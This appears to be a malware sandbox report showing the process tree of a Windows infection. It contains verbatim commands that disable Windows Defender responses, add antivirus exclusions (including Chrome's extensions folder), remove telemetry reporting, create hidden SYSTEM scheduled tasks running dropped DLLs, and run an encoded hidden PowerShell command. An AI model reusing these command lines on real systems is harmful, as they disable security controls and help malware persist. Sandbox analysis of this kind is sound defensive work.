C:\Users\Admin\AppData\Local\Temp\HsWwSWsMcedATsTYz\EAgXFEACPULOvsO\QcWKUqX.exeC:\Users\Admin\AppData\Local\Temp\HsWwSWsMcedATsTYz\EAgXFEACPULOvsO\QcWKUqX.exe Ss /Ehsite_idyEn 385121 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4932
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3856
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JOahYsgOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JOahYsgOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PPPvEJXwvFXU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PPPvEJXwvFXU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aGyefaDRXtWeAIGeOjR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aGyefaDRXtWeAIGeOjR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fWbXzUMxesUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fWbXzUMxesUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lyspIhhmnAebC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lyspIhhmnAebC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\vJJgsAKjhEJjBmVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\vJJgsAKjhEJjBmVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HsWwSWsMcedATsTYz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HsWwSWsMcedATsTYz\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\zDPJRkIaidOpcaKO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\zDPJRkIaidOpcaKO\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JOahYsgOU" /t REG_DWORD /d 0 /reg:323⤵PID:3292
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JOahYsgOU" /t REG_DWORD /d 0 /reg:324⤵PID:1984
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JOahYsgOU" /t REG_DWORD /d 0 /reg:643⤵PID:1380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPvEJXwvFXU2" /t REG_DWORD /d 0 /reg:323⤵PID:3648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPvEJXwvFXU2" /t REG_DWORD /d 0 /reg:643⤵PID:5100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aGyefaDRXtWeAIGeOjR" /t REG_DWORD /d 0 /reg:323⤵PID:432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aGyefaDRXtWeAIGeOjR" /t REG_DWORD /d 0 /reg:643⤵PID:4176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fWbXzUMxesUn" /t REG_DWORD /d 0 /reg:323⤵PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fWbXzUMxesUn" /t REG_DWORD /d 0 /reg:643⤵PID:4816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lyspIhhmnAebC" /t REG_DWORD /d 0 /reg:323⤵PID:4996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lyspIhhmnAebC" /t REG_DWORD /d 0 /reg:643⤵PID:2464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\vJJgsAKjhEJjBmVB /t REG_DWORD /d 0 /reg:323⤵PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\vJJgsAKjhEJjBmVB /t REG_DWORD /d 0 /reg:643⤵PID:4012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HsWwSWsMcedATsTYz /t REG_DWORD /d 0 /reg:323⤵PID:5016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HsWwSWsMcedATsTYz /t REG_DWORD /d 0 /reg:643⤵PID:4988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\zDPJRkIaidOpcaKO /t REG_DWORD /d 0 /reg:323⤵PID:2084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\zDPJRkIaidOpcaKO /t REG_DWORD /d 0 /reg:643⤵PID:4324
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjHQEYnxV" /SC once /ST 03:15:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjHQEYnxV"2⤵PID:4552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjHQEYnxV"2⤵PID:3428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OhbVxWOWyrnkKLyjv" /SC once /ST 00:21:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\zDPJRkIaidOpcaKO\UMViOqpgisTMDkN\MaHAxPh.exe\" gS /kdsite_idqwc 385121 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "OhbVxWOWyrnkKLyjv"2⤵PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1232
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4460
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:836
-
C:\Windows\Temp\zDPJRkIaidOpcaKO\UMViOqpgisTMDkN\MaHAxPh.exeC:\Windows\Temp\zDPJRkIaidOpcaKO\UMViOqpgisTMDkN\MaHAxPh.exe gS /kdsite_idqwc 385121 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2396 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEXFrSIllLhpZteWiQ"2⤵PID:3320
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4304
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:5108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4560
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4852
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JOahYsgOU\jXKNkb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ArbjabrdjJSwhHH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ArbjabrdjJSwhHH2" /F /xml "C:\Program Files (x86)\JOahYsgOU\njUjCDq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ArbjabrdjJSwhHH"2⤵PID:960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ArbjabrdjJSwhHH"2⤵PID:1532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lUfkDZtadIKXVY" /F /xml "C:\Program Files (x86)\PPPvEJXwvFXU2\fGkpfET.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NSqDjYcxbWOSB2" /F /xml "C:\ProgramData\vJJgsAKjhEJjBmVB\uzGCaqi.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZuiNXCthJSjGNtDrq2" /F /xml "C:\Program Files (x86)\aGyefaDRXtWeAIGeOjR\sUrAPHq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IpYkXCdsexBYlhCyIan2" /F /xml "C:\Program Files (x86)\lyspIhhmnAebC\gBEzgeU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ithrobiXMVHzunXcc" /SC once /ST 00:19:27 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\zDPJRkIaidOpcaKO\OZYSOrTy\LiYASqj.dll\",#1 /Qtsite_idUlb 385121" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ithrobiXMVHzunXcc"2⤵PID:3900
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3540
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4524
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2688
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OhbVxWOWyrnkKLyjv"2⤵PID:4892
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\zDPJRkIaidOpcaKO\OZYSOrTy\LiYASqj.dll",#1 /Qtsite_idUlb 3851211⤵PID:3904
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\zDPJRkIaidOpcaKO\OZYSOrTy\LiYASqj.dll",#1 /Qtsite_idUlb 3851212⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3476 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ithrobiXMVHzunXcc"3⤵PID:4040
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
